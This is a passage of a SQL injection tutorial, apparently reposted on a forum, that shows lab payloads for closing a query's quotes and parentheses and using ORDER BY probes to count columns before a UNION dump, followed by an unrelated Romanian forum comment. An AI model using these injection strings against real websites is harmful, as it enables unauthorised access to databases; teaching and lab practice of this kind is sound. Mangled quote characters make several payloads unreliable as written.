query. SELECT * FROM TABLE_NAME WHERE ID=(” 1?) –+ “) LIMIT 0,1 SELECT * FROM TABLE_NAME WHERE ID=(” 1?) # “) LIMIT 0,1 Injection: 1?) –+ Injection: 1?) %23 (NOTE: %23 is URLENCODE for #) Injection: 1?) –+ Injection: 1?) %23 (NOTE: %23 is URLENCODE for #) Once we are in this position, having fixed the query after successful injection, we can inject the code in between the delimiter and the comments we injected. FINDING COLUMNS USED BY DEVELOPER IN QUERIES As we saw during the enumeration phase, the application is interacting with the database and displaying some info on the web pages. Therefore we will be using UNION statements to dump the database info. A constraint to the use of the union statements is that the columns on both sides of union should be the same; therefore our last hurdle before we get something out from the database is to know number of columns used by developer in his query. To do this we use a SQL Keyword “ORDER BY”. When we use ORDER BY in a query, the result set is arranged as per the selection of ORDER BY clause. If the column is not valid, we get an error. Therefore in our injections, we start to add ORDER BY 1, ORDER BY 2 , ORDER BY 3………… and try to observe the result. Injection: 1? ORDER BY 1 –+ => No Error. Injection: 1? ORDER BY 2 –+ => No Error. Injection: 1? ORDER BY 3 –+ => No Error. Injection: 1? ORDER BY 4 –+ => Error – Unknown column ’4? in ‘order clause’, indicating we have 3 columns. For Lesson2: Injection: 1 ORDER BY 1 –+ => No Error. Injection: 1 ORDER BY 2–+ => No Error. Injection: 1 ORDER BY 3 –+ => No Error. Injection: 1 ORDER BY 4 –+ => Error – Unknown column ’4? in ‘order clause’, indicating we have 3 columns. For Lesson3 Injection: 1?) ORDER BY 1 –+ => No Error. Injection: 1?) ORDER BY 2–+ => No Error. Injection: 1?) ORDER BY 3 –+ => No Error. Injection: 1?) ORDER BY 4 –+ => Error – Unknown column ’4? in ‘order clause’, indicating we have 3 columns. For Lesson4 Injection: 1?) ORDER BY 1 –+ => No Error. Injection: 1?) ORDER BY 2–+ => No Error. Injection: 1?) ORDER BY 3 –+ => No Error. Injection: 1?) ORDER BY 4 –+ => Error – Unknown column ’4? in ‘order clause’, indicating we have 3 columns. Once we know the number of columns in the queries, we can just go ahead and dump the databases and data of our choice. We will continue further in the next part of this series. You can also refer to the video postings about the same topic from the following link: Sursa: InfoSec Institute Resources – SQL Injections: An Introduction

Sfinte cacat Cum sa faci un program ca asta: 1. Google 2. Surse Bisual Basic 6 3. Copy/Paste in VB6 4. Cateva butoane 5. Gata multi-shit Hy -1 - 0 RST